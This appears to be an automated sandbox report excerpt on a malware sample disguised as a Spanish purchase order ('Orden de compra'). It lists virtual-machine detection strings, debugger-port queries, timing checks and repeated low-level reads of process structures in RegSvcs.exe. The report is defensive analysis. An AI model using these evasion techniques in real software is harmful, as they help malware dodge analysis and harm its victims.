          Source: explorer.exe, 0000000A.00000003.3075767239.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040ACF0 LdrLoadDll,9_2_0040ACF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A0185 mov eax, dword ptr fs:[00000030h]9_2_018A0185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01904180 mov eax, dword ptr fs:[00000030h]9_2_01904180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01904180 mov eax, dword ptr fs:[00000030h]9_2_01904180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E019F mov eax, dword ptr fs:[00000030h]9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E019F mov eax, dword ptr fs:[00000030h]9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E019F mov eax, dword ptr fs:[00000030h]9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E019F mov eax, dword ptr fs:[00000030h]9_2_018E019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185A197 mov eax, dword ptr fs:[00000030h]9_2_0185A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185A197 mov eax, dword ptr fs:[00000030h]9_2_0185A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185A197 mov eax, dword ptr fs:[00000030h]9_2_0185A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191C188 mov eax, dword ptr fs:[00000030h]9_2_0191C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191C188 mov eax, dword ptr fs:[00000030h]9_2_0191C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019261C3 mov eax, dword ptr fs:[00000030h]9_2_019261C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019261C3 mov eax, dword ptr fs:[00000030h]9_2_019261C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h]9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h]9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE1D0 mov ecx, dword ptr fs:[00000030h]9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h]9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE1D0 mov eax, dword ptr fs:[00000030h]9_2_018DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018901F8 mov eax, dword ptr fs:[00000030h]9_2_018901F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019361E5 mov eax, dword ptr fs:[00000030h]9_2_019361E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01920115 mov eax, dword ptr fs:[00000030h]9_2_01920115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190A118 mov ecx, dword ptr fs:[00000030h]9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190A118 mov eax, dword ptr fs:[00000030h]9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190A118 mov eax, dword ptr fs:[00000030h]9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190A118 mov eax, dword ptr fs:[00000030h]9_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov eax, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E10E mov ecx, dword ptr fs:[00000030h]9_2_0190E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01890124 mov eax, dword ptr fs:[00000030h]9_2_01890124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h]9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h]9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F4144 mov ecx, dword ptr fs:[00000030h]9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h]9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F4144 mov eax, dword ptr fs:[00000030h]9_2_018F4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866154 mov eax, dword ptr fs:[00000030h]9_2_01866154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866154 mov eax, dword ptr fs:[00000030h]9_2_01866154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185C156 mov eax, dword ptr fs:[00000030h]9_2_0185C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F8158 mov eax, dword ptr fs:[00000030h]9_2_018F8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934164 mov eax, dword ptr fs:[00000030h]9_2_01934164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934164 mov eax, dword ptr fs:[00000030h]9_2_01934164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186208A mov eax, dword ptr fs:[00000030h]9_2_0186208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018580A0 mov eax, dword ptr fs:[00000030h]9_2_018580A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F80A8 mov eax, dword ptr fs:[00000030h]9_2_018F80A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019260B8 mov eax, dword ptr fs:[00000030h]9_2_019260B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019260B8 mov ecx, dword ptr fs:[00000030h]9_2_019260B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E20DE mov eax, dword ptr fs:[00000030h]9_2_018E20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0185A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E60E0 mov eax, dword ptr fs:[00000030h]9_2_018E60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018680E9 mov eax, dword ptr fs:[00000030h]9_2_018680E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185C0F0 mov eax, dword ptr fs:[00000030h]9_2_0185C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A20F0 mov ecx, dword ptr fs:[00000030h]9_2_018A20F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E4000 mov ecx, dword ptr fs:[00000030h]9_2_018E4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01902000 mov eax, dword ptr fs:[00000030h]9_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h]9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h]9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h]9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E016 mov eax, dword ptr fs:[00000030h]9_2_0187E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185A020 mov eax, dword ptr fs:[00000030h]9_2_0185A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185C020 mov eax, dword ptr fs:[00000030h]9_2_0185C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6030 mov eax, dword ptr fs:[00000030h]9_2_018F6030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862050 mov eax, dword ptr fs:[00000030h]9_2_01862050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6050 mov eax, dword ptr fs:[00000030h]9_2_018E6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188C073 mov eax, dword ptr fs:[00000030h]9_2_0188C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188438F mov eax, dword ptr fs:[00000030h]9_2_0188438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188438F mov eax, dword ptr fs:[00000030h]9_2_0188438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E388 mov eax, dword ptr fs:[00000030h]9_2_0185E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E388 mov eax, dword ptr fs:[00000030h]9_2_0185E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E388 mov eax, dword ptr fs:[00000030h]9_2_0185E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01858397 mov eax, dword ptr fs:[00000030h]9_2_01858397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01858397 mov eax, dword ptr fs:[00000030h]9_2_01858397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01858397 mov eax, dword ptr fs:[00000030h]9_2_01858397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019043D4 mov eax, dword ptr fs:[00000030h]9_2_019043D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019043D4 mov eax, dword ptr fs:[00000030h]9_2_019043D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h]9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h]9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h]9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018683C0 mov eax, dword ptr fs:[00000030h]9_2_018683C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h]9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h]9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h]9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h]9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h]9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A3C0 mov eax, dword ptr fs:[00000030h]9_2_0186A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E3DB mov eax, dword ptr fs:[00000030h]9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E3DB mov eax, dword ptr fs:[00000030h]9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E3DB mov ecx, dword ptr fs:[00000030h]9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190E3DB mov eax, dword ptr fs:[00000030h]9_2_0190E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E63C0 mov eax, dword ptr fs:[00000030h]9_2_018E63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191C3CD mov eax, dword ptr fs:[00000030h]9_2_0191C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018703E9 mov eax, dword ptr fs:[00000030h]9_2_018703E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018963FF mov eax, dword ptr fs:[00000030h]9_2_018963FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E3F0 mov eax, dword ptr fs:[00000030h]9_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E3F0 mov eax, dword ptr fs:[00000030h]9_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E3F0 mov eax, dword ptr fs:[00000030h]9_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A30B mov eax, dword ptr fs:[00000030h]9_2_0189A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A30B mov eax, dword ptr fs:[00000030h]9_2_0189A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A30B mov eax, dword ptr fs:[00000030h]9_2_0189A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185C310 mov ecx, dword ptr fs:[00000030h]9_2_0185C310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01880310 mov ecx, dword ptr fs:[00000030h]9_2_01880310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01938324 mov eax, dword ptr fs:[00000030h]9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01938324 mov ecx, dword ptr fs:[00000030h]9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01938324 mov eax, dword ptr fs:[00000030h]9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01938324 mov eax, dword ptr fs:[00000030h]9_2_01938324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192A352 mov eax, dword ptr fs:[00000030h]9_2_0192A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01908350 mov ecx, dword ptr fs:[00000030h]9_2_01908350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h]9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E035C mov eax, dword ptr fs:[00000030h]9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E035C mov eax, dword ptr fs:[00000030h]9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E035C mov eax, dword ptr fs:[00000030h]9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E035C mov ecx, dword ptr fs:[00000030h]9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E035C mov eax, dword ptr fs:[00000030h]9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E035C mov eax, dword ptr fs:[00000030h]9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0193634F mov eax, dword ptr fs:[00000030h]9_2_0193634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190437C mov eax, dword ptr fs:[00000030h]9_2_0190437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E0283 mov eax, dword ptr fs:[00000030h]9_2_018E0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E0283 mov eax, dword ptr fs:[00000030h]9_2_018E0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E0283 mov eax, dword ptr fs:[00000030h]9_2_018E0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E284 mov eax, dword ptr fs:[00000030h]9_2_0189E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E284 mov eax, dword ptr fs:[00000030h]9_2_0189E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h]9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F62A0 mov ecx, dword ptr fs:[00000030h]9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h]9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h]9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h]9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h]9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h]9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h]9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h]9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h]9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h]9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019362D6 mov eax, dword ptr fs:[00000030h]9_2_019362D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018702E1 mov eax, dword ptr fs:[00000030h]9_2_018702E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018702E1 mov eax, dword ptr fs:[00000030h]9_2_018702E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018702E1 mov eax, dword ptr fs:[00000030h]9_2_018702E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185823B mov eax, dword ptr fs:[00000030h]9_2_0185823B
